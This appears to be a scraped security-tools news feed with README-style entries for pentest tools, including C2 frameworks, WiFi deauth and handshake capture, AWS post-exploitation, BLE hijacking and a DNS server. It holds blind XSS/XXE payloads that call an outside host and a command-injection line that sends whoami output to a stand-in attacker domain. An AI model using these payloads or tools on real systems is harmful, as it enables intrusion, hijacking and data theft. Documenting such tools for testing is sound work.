Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5846 articles
Browse latest View live

Nuages - A Modular C2 Framework

$
0
0

Nuages is a modular C2 framework.
Refer to the Wiki for documentation, do not hesitate to open issues for help, bug reports or feature requests

Introduction
Nuages aims at being a C2 framework in which back end elements are open source, whilst implants and handlers must be developed ad hoc by users. As a result, it does not provide a way to generate implants, but an open source framework to develop and manage compatible implants that can leverage all the back end resources already developed.
This design hopes to facilitate penetration testing by facilitating the development of custom implants and reducing the likelihood of implants being detected by defensive solutions.
Although Nuages is functioning, it is still a work in progress and contribution are welcome, whether it is solely testing, or development of new modules and compatible clients.
For testing and refererence, an example implant and handler are provided on this repo.

Architecture


Nuages C2: It is the core of the C2 and manages the implants, it is open source and should not need to be customized. It exposes the Nuages API, accessible over REST or Socket.io.
Implants: Custom code to run on the target devices, they can communicate with handlers over custom protocol or directly with the Nuages API.
Handlers: Custom code acting as a proxy between Implants and the Nuages API, to implemenet custom communication protocols (DNS tunneling, domain fronting, IRC etc...).
Clients: Clients rely on the Nuages API and can be implemented in any form such as cli or web application.

Disclaimer
This project is intended for security researchers and penetration testers and should not be used for any illegal activities.



Hashcatch - Capture Handshakes Of Nearby WiFi Networks Automatically

$
0
0
Hashcatch deauthenticates clients connected to all nearby WiFi networks and tries to capture the handshakes. It can be used in any linux device including Raspberry Pi and Nethunter devices so that you can capture handshakes while walking your dog
Written by @SivaneshAshok

PoC of hashcatch (running with a couple of WiFi networks within range)


Setting up
  1. ./setup.sh
  2. Enter the interface that can be switched to monitor mode
  3. The script will install the prerequisites

Usage
sudo ./hashcatch.sh
  • The script runs indefinitely until keyboard interrupt
  • If you're targeting a wifi network, spend around 20 to 30 seconds within the wifi's range to ensure handshake capture
  • Handshakes captured will be stored in handshakes/ directory
  • The captured WiFi network's BSSID and ESSID will be stored in db file
  • [Experimental] If you are connected to the internet while capturing, the following data will also be added to the db file
    • latitude
    • longitude
    • signal radius
    • time of record
    • Note: Kudos to Alexander Mylnikov for the API he's running that returns the location details of a router's MAC address using public databases

The "config" file
  • The config file will be generated by the setup.sh script
  • You can later edit the "interface" field to set the interface of your choice
  • You can also add an "ignore" field to mention the WiFi networks you want hashcatch to ignore while running
  • Refer the example given below to know about the format in which entries should be added to config file

Format of config file
option name=option1,option2,option3
No space in between option name, equal sign and options
Example
interface=wlan0
ignore=Google Starbucks,AndroidAP

Features to be added
  • PMKID attack
  • Pixiedust attack for WPS enabled networks
  • More location features
  • Automatically check handshakes with a rainbow table
PS: Even though I was working on this script few days before @evilsocket posted about his pwnagotchi, his work has definitely been an inspiration for this project!


Constellation - A Graph-Focused Data Visualisation And Interactive Analysis Application

$
0
0

Constellation is a graph-focused data visualisation and interactive analysis application enabling data access, federation and manipulation capabilities across large and complex data sets.

Vision Statement
Constellation is a first class, domain agnostic data visualisation and analysis application enabling the user to solve large and complex data problems in a simple and intuitive way.
  • Users: data analysts, data scientists, and all people interested in graph data analysis.
  • Data analysis domains: graph datasets with rich feature data e.g. social networks, network infrastructure, chemical composition, etc.

Prerequisites
  • Constellation requires at least Open JDK 8 with JFX 8 support build to be installed and is known to work on Windows 64-bit and Linux 64-bit.
  • The OpenGL graph display works with NVIDIA and ATI graphics cards that support OpenGL 3.3 or later. It is known to not work with Intel on-board graphics cards.

Download Constellation
Download Constellation by going to the release page.

Run Constellation
Unzip the constellation.zip bundle and double click the bin/constellation64.exe for Windows or run the bin\constellation shell script for Linux.
There is currently no support for Mac and the feature request is tracked by Issue #21.

Build Constellation
To build Constellation from source code do the following:
  • Download NetBeans 8.2
  • Download the Open JDK 8 with JFX 8 from Azul website for Windows 64 bit build or Linux 64 bit build
  • Clone this repository
  • Update the netbeans.conf file's netbeans_jdkhome entry (The file can be found under <C:\Program Files\NetBeans 8.2\etc> folder)
  • Open the Constellation_Core module suite from NetBeans
  • Important Files -> build.xml -> Right click -> Update dependencies and clean build
  • Right click -> Run

Package Constellation
To package Constellation in a zip bundle do the following:
  • In NetBeans, expand Constellation_Core -> Important Files
  • Right click on Build Script and run the build-zip target
This will create a dist/constellation.zip file. It does not contain the JRE as that depends on the platform you wish to run it on.
The JRE location Constellation looks for is defined in etc/constellation.conf. For example, if you wanted to package a JRE in the zip bundle, copy the jre into the same folder level as bin and update the jdkhome variable to the name of the JRE folder.

Common Troubleshooting Checks
  • You can check whether your graphics card is supported by following these steps:
  1. Click on File> New Graph to create a graph
  2. Click on Experimental> Build Graph> Sphere Graph to create a random graph.
  3. If you can see a graph try to interact with it using the mouse.
  4. If the graph view remains blank, you may not have a supported graphics card.
  • Click on Help> JOGL Version to see the graphics card capabilities of your machine.
  • Click on Help> Show Logs to view Constellation log information.

Contributing to Constellation
For more information please see the contributing guide.

Acknowledgments
Third party libraries and assets were used in development of Constellation, please view attribution list for details.


0xsp Mongoose v1.7 - Linux/Windows Privilege Escalation intelligent Enumeration Toolkit

$
0
0

Using 0xsp mongoose you will be able to scan targeted operating system for any possible way for privilege escalation attacks, starting from collecting information stage until reporting information through 0xsp Web Application API.
user will be able to scan different Linux / windows Operation systems at the same time with high performance, without spending time looking inside the terminal or text file for what is found, mongoose shortens this way by allowing you to send this information directly into web application friendly interface through easy API endpoint.
project is divided into two sections server& agent .
server has been coded with PHP(codeigniter) you need to install this application into your preferred environment, you can use it online or on your localhost. user is free to choice .also contribution to enhancing features are most welcomed.
Agent has been coded as ELF with Lazarus Free Pascal will be released with (32, 64 bit) while executing Agent on targeted system with all required parameters. user is free to decide whether willing to communicate with Server App to store results and explore them easily . or he can also run this tool without Web API Connection.

Agent Usage
  1. make sure to give it executable permission chmod +x agent
  2. ./agent -h (display help instructions)
-k --check kernel for common used privilige escalations exploits. 
-u --Getting information about Users , groups , releated information.
-c --check cronjobs.
-n --Retrieve Network information,interfaces ...etc.
-w --Enumerate for Writeable Files , Dirs , SUID ,
-i --Search for Bash,python,Mysql,Vim..etc History files.
-f --search for Senstive config files accessible & private stuff.
-o --connect to 0xsp Web Application.
-p --Show All process By running under Root,Check For Vulnerable Packages.
-e --Kernel inspection Tool, it will help to search through tool databases for kernel vulnerabilities.
-x --secret Key to authorize your connection with WebApp API (default is 0xsp).
-a --Display README.




Server Web App (must be like this : http://host/0xsp/ )

  1. make sure to have at least php 5.6 or above
  2. requires mysql 5.6
  3. make sure to add Web application on root path / with folder name 0xsp as [ http://localhost/0xsp/] , Agent will not connect to it in case not configured correctly . the agent will connect only as following case :
./agent {SCAN OPTION} -o localhost -x secretkey

Examples With WebApi
./agent -c -o localhost -x 0xsp { enumerate for CRON Tasks and Transfer results into Web Api} 
./agent -e -o localhost -x 0xsp { intelligent Exploits Detector }
./agent -c -e localhost -x 0sxp { will run two scans together and send found results directly }
./agent -m -o 10.10.13.1 -x 0xsp { RUN all Scans together and export it to Web API}

Examples Without WebApi
./agent -c -k -p { this will run 3 scans at the same time with out sending results into Web Api }

Agent Features
  1. High performance , stability , Output results Generated while executing no delays
  2. Ability to execute most of functions with intelligent techniques .
  3. results are being sent to Quick Web API
  4. Exception Handling .
  5. inbuilt Json Data set for publicly disclosed Exploits .
  6. Fast As Mongoose




B-XSSRF - Toolkit To Detect And Keep Track On Blind XSS, XXE And SSRF

$
0
0

Toolkit to detect and keep track on Blind XSS, XXE& SSRF.

SETUP
  • Upload the files to your server.
  • Create a Database and upload database.sql file to it.
  • Change the DB Credentials in db.php file.
  • Ready.

USAGE
BLIND XSS
<embed src="http://mysite.com/bxssrf/request.php">
<script src="http://mysite.com/bxssrf/request.php">
BLIND XXE
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;
]>
<r></r>
SSRF
GET /testssrf.php=http://mysite.com/bxssrf/request.php

DEFAULT CREDENTIALS
USER : admin@test.com
PASS : 123456


HTTP Request Smuggler - Extension For Burp Suite Designed To Help You Launch HTTP Request Smuggling Attacks

$
0
0

This is an extension for Burp Suite designed to help you launch HTTP Request Smuggling attacks, originally created during HTTP Desync Attacks research. It supports scanning for Request Smuggling vulnerabilities and also aids exploitation by handling cumbersome offset-tweaking for you.

Install
The easiest way to install this is in Burp Suite, via Extender -> BApp Store.
If you prefer to load the jar manually, in Burp Suite (community or pro), use Extender -> Extensions -> Add to load build/libs/http-request-smuggler-all.jar

Compile
  • Turbo Intruder is a dependency of this project, add it to the root of this source tree as turbo-intruder-all.jar
  • Build with gradle fatJar

Use
Right click on a request and click 'Launch Desync probe', then watch the extension's output pane under Extender->Extensions->HTTP Request Smuggler
If you're using Burp Pro, any findings will also be reported as scan issues.
For more advanced use watch the video.

Practice
We've released free online labs to practise against.


Telegram C# C2 - A Command and Control Tool for Telegram Bot Communication

$
0
0

Command and Control for C# Writing
Author: Leiothrix
Telegram: @Leiothrix
Twitter: @wh4am1
Team: QQ愛&Love

Install

Nuget download these package
using System.IO;
using Telegram.Bot;
using Telegram.Bot.Args;
using Telegram.Bot.Types.InputFiles;
using AForge.Video;
using AForge.Controls;
using AForge.Video.DirectShow;

Add related classes in 'References'
System.Drawing;
System.Windows.Forms;

How to used

Modify your Token to the program
 static void Main(){
botClient = new TelegramBotClient("token"); //Your Token
botClient.OnMessage += Bot_OnMessage;
botClient.StartReceiving();
Thread.Sleep(int.MaxValue);
}


have good fun.

Proxy

TelegramBotClient allows you to use a proxy for Bot API connections.

HTTP

You can pass an IWebProxy to bot client for HTTP Proxies.
 // using System.Net;

var httpProxy = new WebProxy("https://example.org", 8080)
{
Credentials = new NetworkCredential("USERNMAE", "PASSWORD")
};
var botClient = new TelegramBotClient("YOUR_API_TOKEN", httpProxy);

SOCKS 5

You can use an external NuGet package: HttpToSocks5Proxy provided
// using MihaZupan;

var proxy = new HttpToSocks5Proxy(Socks5ServerAddress, Socks5ServerPort);

// Or if you need credentials for your proxy server:
var proxy = new HttpToSocks5Proxy(
Socks5ServerAddress, Socks5ServerPort, "USERNAME", "PASSWORD"
);

// Allows you to use proxies that are only allowing connections to Telegram
// Needed for some proxies
proxy.ResolveHostnamesLocally = true;

var botClient = new TelegramBotClient("YOUR_API_TOKEN", proxy);

How to compile

How to compile all DLL files into an EXE file

First,You need download ILMerge tool,this is a tool for merging all references to .NET programs.
ilmerge.exe /target:exe /out:TGbot.exe ConsoleApp1.exe  AForge.Controls.dll AForge.dll AForge.Imaging.dll AForge.Math.dll AForge.Video.DirectShow.dll AForge.Video.dll Newtonsoft.Json.dll Telegram.Bot.dll /targetplatform:v4

/target -> library=>DLL exe=>exe

/targetplatform:v4 -> Compiler platform is .net 4.0

/out -> Merged output file,Parameters are followed by files that need to be merged
Finally, generate output in the directory specified by the out parameter


Barq - The AWS Cloud Post Exploitation Framework!

$
0
0

barq: The AWS Cloud Post Exploitation framework!

What is it?
barq is a post-exploitation framework that allows you to easily perform attacks on a running AWS infrastructure. It allows you to attack running EC2 instances without having the original instance SSH keypairs. It also allows you to perform enumeration and extraction of stored Secrets and Parameters in AWS.

Prerequisites
  • An existing AWS account access key id and secret (Token too in some case)
  • Python 2 or 3. It can run with both. To run the msfvenom payloads, you need msfvenom to be available on your workstation, with the PATH setup correctly.

Installing
For python 2:
pip install -r requirements.txt
For python3
pip3 install -r requirements.txt
Better to create a virtualenv environment for the tool. Please note that using sudo with pip is not recommended.

Author
  • Mohammed Aldoub, also known as Voulnet, find me on Twitter

Main Features
  • Attacking EC2 instances without knowing keypairs or connection profiles/passwords.
  • Dumping EC2 secrets and parameters.
  • Enumerating EC2 instances and security groups.
  • Ability to launch Metasploit and Empire payloads against EC2 instances.
  • Training mode to test attacks and features without messing with running production environment.
  • Tab-completed commands in a menu-based navigation system.
  • Ability to dump EC2 instance metadata details.
  • Ability to use EC2 keys or tokens (for example acquired from compromised instances or leaked source code)
  • Printing for you the listening commands for msfconsole in cli mode for easy copy-pasting.

Contributing
PRs are welcome!



Wordlister - A Simple Wordlist Generator And Mangler Written In Python

$
0
0

A simple wordlist generator and mangler written in python. It makes use of python multiprocessing capabilities in order to speed up his job (CPU intensive).

Supported permutations:
  • Capital
  • Upper
  • 1337
  • Append
  • Prepend

Additional functions:
  • Test/Dry run
  • Multiprocessing
  • Multicore
  • Possibility to adjust cores/processes number manually.
  • Each generated password doesnt contain same word twice.

Preview:
usage: wordlister.py [-h] --input INPUT --perm PERM --min MIN --max MAX
[--test TEST] [--cores CORES] [--leet] [--cap] [--up]
[--append APPEND] [--prepend PREPEND]

A simple wordlist generator and mangler written in python.

optional arguments:
-h, --help show this help message and exit
--test TEST Output first N iterations (single process/core)
--cores CORES Manually specify processes/cores pool that you want to
use
--leet Activate l33t mutagen
--cap Activate capitalize mutagen
--up Activate uppercase mutagen
--append APPEND Append chosen word (append 'word' to all passwords)
--prepend PREPEND Append chosen word (prepend 'word' to all passwords)

required arguments:
- -input INPUT Input file name
--perm PERM Max number of words to be combined on the same line
--min MIN Minimum generated password length
--max MAX Maximum generated password length
This project is for educational purposes only. Don't use it for illegal activities. I don't support nor condone illegal or unethical actions and I can't be held responsible for possible misuse of this software.


Ehtools - Framework Of Serious Wi-Fi Penetration Tools

$
0
0

Wi-Fi tools keep getting more and more accessible to beginners, and the Ehtools Framework is a framework of serious penetration tools that can be explored easily from within it. This powerful and simple tool can be used for everything from installing new add-ons to grabbing a WPA handshake in a matter of seconds. Plus, it's easy to install, set up, and utilize.

How to install ehtools
cd ehtools
chmod +x install.sh
./install.sh


Selecting version of framework
INFO: After executing install.sh it will be ask you to select version of Ehtools Framework - PRO os LITE. Select LITE if you did not buy Ehtools Framework PRO. If you bought Ehtools Framework PRO, select PRO.
./install.sh

What version of Ehtools Framework do you want to install?(pro/lite):
If you did not buy Ehtools Framework PRO, select LITE!
If you bought Ehtools Framework PRO, select PRO!
(version)>
If you select Ehtools Framework PRO, you will need to activate it with your Ehtools Activation Key that you need to bought on the ehtools site. If you have Ehtools Activation Key, read the following instructions.

How to activate ehtools PRO
This key you can buy on the ehtools site for one dollar! This key is used to activate ehtools PRO enter it in the input field of the activation key in the file install.sh and then you can install ehtools and use it only for educational purposes!

WARNING: The key works only one week then it changes!
You need to have time to enter it before it is updated!
./install.sh
Enter your ehtools activation key! You can buy it on the ehtools site!
(activation_key)> 
Also, we do not recommend to change the source code of ehtools because it is very complex and you can mess up something and disrupt the framework!
WARNING: We do not recommend to change ehtools source code
because you can disrupt framework!

How to uninstall ehtools
ehtools -r
WARNING: Do not do it if you want to reinstall
ehtools PRO which you bought, do not do it because
you will need to buy it one more time!

Attacking frameworks
Most new Wi-Fi hacking tools rely on many of the same underlying attacks, and scripts that automate using other more familiar tools like Aireplay-ng are often referred to as frameworks. These frameworks try to organize tools in smart or useful ways to take them a step beyond the functionality or usability of the original program.
An excellent example of this are programs that integrate scanning tools like Airodump-ng, attacks like WPS Pixie-Dust, and cracking tools like Aircrack-ng to create an easy-to-follow attack chain for beginners. Doing this makes the process of using these tools easier to remember and can be seen as sort of a guided tour. While each of these attacks is possible without the hand-holding, the result can be faster or more convenient than trying to do so yourself.
An example of this we've covered is the Airgeddonframework, a wireless attack framework that does useful things like automating the target selection process and eliminating the time a user spends copying and pasting information between programs. This saves valuable time for even experienced pentesters but has the disadvantage of preventing beginners from understanding what's happening "under the hood" of the attack. While this is true, most of these frameworks are fast, efficient, and dead simple to use, enabling even beginners to take on and disable an entire network.

UX/UI impruvements for beginners
The Ehtools Framework starts by merely typing the letter ehtools or eht into a terminal window, then it asks for the name of your network interfaces after the first run. It uses the names you supply to connect to the tools needed to execute any attacks you select. Aside from that initial input, the majority of the possible attacks can be performed merely by choosing the option number from the menu. This means you can grab a network handshake or download a new hacking tool like Pupy by just selecting from one of the menu options.

Use basic networking tools
To begin, we can access data about the network we're currently connected to, as well as any network interfaces, from the main menu. Here, we can find local information by just typing l to pull up local IP information, as seen below.
This allows us to do things like scan the network for other devices. This part of Ehtools Framework gives us better visibility on a network and situational awareness of what devices are around us. The various information can be broken down as follows:
(ehtools)> if
INFO: Runs ifconfig and gives the names and information about all network devices.
(ehtools)> 1
INFO: Enable wlan0.
(d1 disables it)
(ehtools)> 2
INFO: Enable wlan0mon.
(d2 disables it)
(ehtools)> 3
INFO: Randomize or set the MAC address to a specific value.
(ehtools)> 7
INFO: View the public IP address your computer is leaving on sites you visit.
(ehtools)> 19
INFO: Look up the physical address of a given IP address to determine it's relative location.
(ehtools)> scan
INFO: Start an ARP scan on the network to discover nearby devices.
(ehtools)> start
INFO: Start monitor mode on the wireless network adapter.
(ehtools)> stop
INFO: Stop wireless monitor mode on the network adapter.


mpDNS - Multi-Purpose DNS Server

$
0
0

Simple, configurable "clone & run" DNS Server with multiple useful features
  • Should work on Python 2 and 3
  • names.db -> holds all custom records (see examples)
  • Simple wildcards like *.example.com
  • Catch unicode dns requests
  • Custom actions aka macro:
    • {{shellexec::dig google.com +short}}-> Execute shell command and respond with result
    • {{eval::res = '1.1.1.%d' % random.randint(0,256)}}-> Evaluate your python code
    • {{file::/etc/passwd}}-> Respond with localfile contents
    • {{resolve}}-> Forward DNS request to local system DNS
    • {{resolve::example.com}}-> Resolve example.com instead of original record
    • {{echo}}-> Response back with peer address
    • {{shellexec::echo %PEER% %QUERY%}}-> Use of variables
  • Supported query types: A, CNAME, TXT
  • Update names.db records without restart/reload with ./mpdns.py -e
Heavily based on https://github.com/circuits/circuits/blob/master/examples/dnsserver.py
Usage: ./mpdns.py
  • Edit names.db with ./mpdns.py -e no restart required

Offensive and Defensive purposes:
  1. You need a light-weight simple dns-server solution for testing purposes (NOT PRODUCTION!)
  2. Test for various blind injectionvulnerabilities in web applications (ex. /ping.php?ip=$(dig $(whoami).attacker.com))
  3. Easily infiltrate 65K of data in one TXT query
  4. DNS Rebinding
  5. Execute custom macro action on specific query (useful in malware-analysis lab environments)
  6. And lots more. It is highly customizable.

Installing
git clone https://github.com/nopernik/mpDNS

Limitations
  1. Due to UDP Datagram limit of 65535 bytes, DNS response is limited to approx ~65200 bytes
    this limitation applies to TXT records which are splitted into chunks of 256 bytes until response reaches maximum allowed 65200b
    therefore TXT record with macro {{file:localfile.txt}} is limited to 65200 bytes.
  2. No support for nested wildcards test.*.example.com
  3. No support for custom DNS server resolver in {{resolve::example.com}} macro
  4. TTL always set to 0

Examples
names.db example:
# Empty configuration will result in empty but valid responses
#
# Unicode domain names are not supported but still can be catched by the server.
# for example мама-сервер-unicode.google.com will be catched but with SERVFAIL response

passwd.example.com TXT {{file::/etc/passwd}} #comments are ignored
shellexec TXT {{shellexec::whoami}}
eval TXT {{eval::import random; res = random.randint(1,500)}}
resolve1 A {{resolve}}
resolve2 A {{resolve::self}} #same as previous
resolve3 A {{resolve::example.com}}
blabla.com A 5.5.5.5

* A 127.0.0.1
*.example.com A 7.7.7.7
c1.example.com CNAME c2.example.com
c2.example.com CNAME c3.example.com
c3.example.com CNAME google.example.com
google.example.com CNAME google.com
test.example.com A 8.8.8.8
google.com A {{resolve::self}}notgoogle.com A {{resolve::google.com}}

Example output with names.db example:
Regular resolution from DB: dig test.example.com @localhost
;; ANSWER SECTION:
test.example.com. 0 IN A 8.8.8.8
mpDNS output:- Request from 127.0.0.1:57698 -> test.example.com. -> 8.8.8.8 (A)

Recursive CNAME resolution: dig c1.example.com @localhost
;; QUESTION SECTION:
;c1.example.com. IN A

;; ANSWER SECTION:
c1.example.com. 0 IN CNAME c2.example.com.
c2.example.com. 0 IN CNAME c3.example.com.
c3.example.com. 0 IN CNAME google.example.com.
google.example.com. 0 IN CNAME google.com.
google.com. 0 IN A 216.58.206.14
mpDNS output:
- Request from 127.0.0.1:44120      -> c1.example.com.  -> c2.example.com (CNAME)
- Request from 127.0.0.1:44120 -> c2.example.com -> c3.example.com (CNAME)
- Request from 127.0.0.1:44120 -> c3.example.com -> google.example.com (CNAME)
- Request from 127.0.0.1:44120 -> google.example.com -> google.com (CNAME)
- Request from 127.0.0.1:44120 -> google.com -> {{resolve::self}} (A)

Wildcard resolution: dig not-in-db.com @localhost
;; ANSWER SECTION:
not-in-db.com. 0 IN A 127.0.0.1
mpDNS output:- Request from 127.0.0.1:38528 -> not-in-db.com. -> 127.0.0.1 (A)

Wildcard subdomain resolution: dig wildcard.example.com @localhost
;; ANSWER SECTION:
wildcard.example.com. 0 IN A 7.7.7.7
mpDNS output:- Request from 127.0.0.1:39691 -> wildcard.example.com. -> 7.7.7.7 (A)

Forward request macro: dig google.com @localhost
;; ANSWER SECTION:
google.com. 0 IN A 172.217.22.110
mpDNS output:- Request from 127.0.0.1:53487 -> google.com. -> {{resolve::self}} (A)

Forward request of custom domain macro: dig notgoogle.com @localhost
;; ANSWER SECTION:
notgoogle.com. 0 IN A 172.217.22.110
mpDNS output:- Request from 127.0.0.1:47797 -> notgoogle.com. -> {{resolve::google.com}} (A)

File contents macro via TXT query: dig txt passwd.example.com @localhost
;; ANSWER SECTION:
passwd.example.com. 0 IN TXT "root:x:0:0:root:/root:/bin/bash\010daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\010bin:x:2:2:bin:......stripped"
mpDNS output:- Request from 127.0.0.1:38805 -> passwd.example.com. -> ['root:x:0:0:root...(2808)'] (TXT)

Custom python code macro via TXT query: dig txt eval @localhost
;; ANSWER SECTION:
eval. 0 IN TXT "320"
mpDNS output:- Request from 127.0.0.1:33821 -> eval. -> ['320'] (TXT)

Shell command macro via TXT query: dig txt shellexec @localhost
;; ANSWER SECTION:
shellexec. 0 IN TXT "root"
mpDNS output:- Request from 127.0.0.1:50262 -> shellexec. -> ['root'] (TXT)

Have fun!


Btlejack - Bluetooth Low Energy Swiss-army Knife

$
0
0

Btlejack provides everything you need to sniff, jam and hijack Bluetooth Low Energy devices. It relies on one or more BBC Micro:Bit. devices running a dedicated firmware. You may also want to use an Adafruit's Bluefruit LE sniffer or a nRF51822 Eval Kit, as we added support for these devices.
Current version of this tool (2.0) supports BLE 4.x and 5.x. The BLE 5.x support is limited, as it does only support the 1Mbps Uncoded PHY and does not support channel map updates.


Requirements
You need a UNIX based system (for example a Raspberry Pi). If you use the BBC Micro:Bit, you will need one to three Micro:Bit devices (three devices recommended) and for each device one free USB port. The power consumption of a Micro:Bit is rather low, so you can use a single USB port and a passive hub for powering the three recommended units.
If you connect 3 microbits at the same time on your computer, Btlejack will be able to sniff on every advertising channel and has far more chance to capture the connection request.


How to install
First, install the btlejack Python3 client software with Pip:
$ sudo pip3 install btlejack
Then, connect your Micro:Bit device to your computer with a USB cable, mount the associated mass storage device (the mount point must contain MICROBIT), and issue the following command:
$ btlejack -i
This will program every Micro:Bit device connected to your computer, and make them ready to use with Btlejack. It will use the correct firmware version for the current client software, so it is highly recommended to perform this firmware installation procedure each time you update Btlejack.
If you are using a Bluefruit LE sniffer or a nRF51822 Eval Kit, then please use an external SWD programmer to flash your device with this firmware.
Keep your devices connected and you're all set !
NOTE This only works with posix compatible systems.


How to use Btlejack
Using Btlejack is quite easy. Btlejack can:
  • use various devices
  • sniff an existing BLE connection
  • sniff new BLE connections
  • jam an existing BLE connection
  • hijack an existing BLE connection
  • export captured packets to various PCAP formats

Specify devices to use
Btlejack normally tries to autodetect and use connected compatible devices (Micro:Bit only for the moment), but since the firmware can be hacked or modified to work with other nRF51822-based boards, it provides a specific options to allow compatibility with these devices.
The -d option lets you specify one or more devices with Btlejack. Note that this option will disable the automatic detection of devices, and you should add as many devices as you may need:
$ btlejack -d /dev/ttyACM0 -d /dev/ttyACM2 -s


Sniffing an existing connection
First, find an existing connection to target with btlejack:
$ btlejack -s
BtleJack version 1.1

[i] Enumerating existing connections ...
[ - 54 dBm] 0xcd91d517 | pkts: 1
[ - 46 dBm] 0xcd91d517 | pkts: 2
The first value (in dBm) shows the power of the signal, the greater this value is the better the sniffed connection will be.
The second value (hex) is the associated access address, a 32-bit value identifying a link between two bluetooth low energy compatible devices.
The last value is the number of packets seen with this access address. The higher this value is, the more probable the corresponding access address is used.
Then, use the -f option to follow a specific connection:
$ btlejack -f 0xdda4845e
BtleJack version 1.1

[i] Detected sniffers:
> Sniffer #0: fw version 1.1

[i] Synchronizing with connection 0xdda4845e ...
✓ CRCInit: 0x2a035e
✓ Channel Map = 0x1fffffffff
✓ Hop interval = 39
✓ Hop increment = 15
[i] Synchronized, packet capture in progress ...
LL Data: 02 07 03 00 04 00 0a 03 00
LL Data: 0a 08 04 00 04 00 0b 5a 69 70
LL Data: 02 07 03 00 04 00 0a 03 00
LL Data: 0a 08 04 00 04 00 0b 5a 69 70

If you are using more than 1 microbit, Btlejack will parallelize some of the sniffing operations in order to speed up the connection parametres recovery !

Sniffing for new connections
The -c option supported by btlejack allows you to specify the target BD address, or you may want to use any to capture any new connection created.
$ btlejack -c any
BtleJack version 1.1

[i] Detected sniffers:
> Sniffer #0: version 1.1
> Sniffer #1: version 1.1
LL Data: 05 22 df b4 6f 95 c5 55 c0 0a f6 99 23 40 1d 7b 2f 0a 9a f4 93 01 12 00 27 00 00 00 d0 07 ff ff ff ff 1f 0b
[i] Got CONNECT_REQ packet from 55:c5:95:6f:b4:df to 40:23:99:f6:0a:c0
|-- Access Address: 0x0a2f7b1d
|-- CRC Init value: 0x93f49a
|-- Hop interval: 39
|-- Hop increment: 11
|-- Channel Map: 1fffffffff
|-- Timeout: 20000 ms

LL Data: 03 09 08 0f 00 00 00 00 00 00 00
LL Data: 03 09 08 0f 00 00 00 00 00 00 00
LL Data: 0b 06 0c 08 0f 00 09 41
LL Data: 03 06 0c 07 1d 00 d3 07
or you may also want to specify the target BD address:
$ btlejack -c 03:e1:f0:00:11:22


Jamming a connection
Once a connection identified by its access address, you can provide jam it by using the -j option:
$ btlejack -f 0x129f3244 -j̀


Hijacking a BLE connection
Btlejack is also able to hijack an existing connection, use the -t option to do so. Once hijacked, Btlejack will give you a prompt allowing you to interact with the hijacked device.
First, hijack an existing connection:
$ btlejack -f 0x9c68fd30 -t -m 0x1fffffffff
BtleJack version 1.1

[i] Using cached parameters (created on 2018-08-11 01:48:24)
[i] Detected sniffers:
> Sniffer #0: fw version 1.1

[i] Synchronizing with connection 0x9c68fd30 ...
✓ CRCInit: 0x81f733
✓ Channel map is provided: 0x1fffffffff
✓ Hop interval = 39
✓ Hop increment = 9
[i] Synchronized, hijacking in progress ...
[i] Connection successfully hijacked, it is all yours \o/
btlejack>
Then use the following commands to interact with the device: - discover: performs services and characteristics enumeration, will give you all the information about services and characteristics - write: write data to a specific value handle - read: read data from a specific value handle - ll: sends a raw link-layer packet (for ninjas)


discover command
The discover command will send and receive Bluetooth LE packets and retrieve all the services UUIDs and parameters, as well as characteristics UUIDs and parameters:
btlejack> discover
start: 0001 end: 0005
start: 0014 end: 001a
start: 0028 end: ffff
Discovered services:
Service UUID: 1801
Characteristic UUID: 2a05
| handle: 0002
| properties: indicate (20)
\ value handle: 0003

Service UUID: 1800
Characteristic UUID: 2a04
| handle: 0019
| properties: read (02)
\ value handle: 001a

Characteristic UUID: 2a00
| handle: 0015
| properties: read (02)
\ value handle: 0016

Characteristic UUID: 2a01
| handle: 0017
| properties: read (02)
\ value handle: 0018

Service UUID: 1824
Characteristic UUID: 2abc
| handle: 0029
| properties: write indicate (28)
\ value handle: 002a


read command
The read command accepts a single parameter, the value handle corresponding to the characteristic you want to read from:
btlejack> read 0x16
read>> 4c 47 20 77 65 62 4f 53 20 54 56

write command
The write command accepts three parameters:
btlejack> write <value handle> <data format> <data>
Supported data formats:
  • hex: hex data (i.e. "414261")
  • str: text string, may be encapsulated in double quotes


ll command
This last command allows you to send Bluetooth Low Energy Link-layer PDUs, in hex form, as specified in Volume 6, Part B, Chapter 2.4.


PCAP file export
One interesting feature of Btlejack is the possibility to export the captured data to a PCAP file.
Btlejack supports the following DLT formats:
  • DLT_BLUETOOTH_LE_LL_WITH_PHDR (same)
  • DLT_NORDIC_BLE (the one used by Nordic' sniffer)
  • DLT_BLUETOOTH_LE_LL (supported on latest versions of Wireshark)
The output file may be specified using the -o option, while the output format may be specified with the -x option. Valid formats values are: ll_phdr, nordic, or pcap (default).
$ btlejack -f 0xac56bc12 -x nordic -o capture.nordic.pcap
The ll_phdr export type is useful when sniffing an encrypted connection, as it is also supported by crackle. So if you want to sniff and break encrypted connections, this is the way to go.
You may also need to tell crackle to use a specific cracking strategy, by using the -s option:
$ crackle -i some.pcap -s 1


Connection cache
Btlejack uses a connection cache to store some connection-related value in order to speed up things a bit. This connection cache may cause some problems, especially if an access address has been previously seen.
This cache can be flushed with the -z option:
$ btlejack -z


Dumping live packets with Wireshark
Btlejack 2.0 introduces a new -w option that allows you to specify a FIFO path (existing or not) in order to perform packets live analysis:
$ btlejack -c any -w /tmp/blepipe
You can even use a FIFO and an output file as the same time:
$ btlejack -c any -w /tmp/blepipe -o blepackets.pcap


Hint for using btlejack on a Raspberry Pi
If you have previously enabled virtual ethernet over USB (RNDIS), e.g. to setup a Raspberry Pi Zero W over USB, you need to disable this again (i.e. remove dtoverlay=dwc2 from boot/config.txt and modules-load=dwc2,g_ether from boot/cmdline.txt, then sudo reboot), because this would otherwise interfere with the sniffers' USB connections.


Bluetooth LE 5 & 5.1 support
This version supports Bluetooth Low Energy versions 5 and 5.1 and especially the new channel selectrion algorithm introduced in version 5 (CSA #2). However, since the hardware used does not support the two new PHYs added from version 5, it will only be able to sniff, jam, and maybe hijack connections using the 1Mbps uncoded PHY.
Please also note that the current implementation of CSA #2 included in Btlejack does not support channel map updates, for the moment.


Sniffing a new BLE 5 connection
Btlejack automatically detects the channel selection algorithm used, so you don't have to worry and just capture packets as usual.


Sniffing an existing BLE 5 connection
Sniffing an existing BLE 5 connection (that uses the 1Mbps uncoded PHY, and only this PHY) is not so difficult. First, you must specify that you want to target a BLE 5 connection, by using the -5 option. Please note that there is no way to tell if an existing connection uses CSA #2 or CSA #1, so you have to try both techniques until one works.
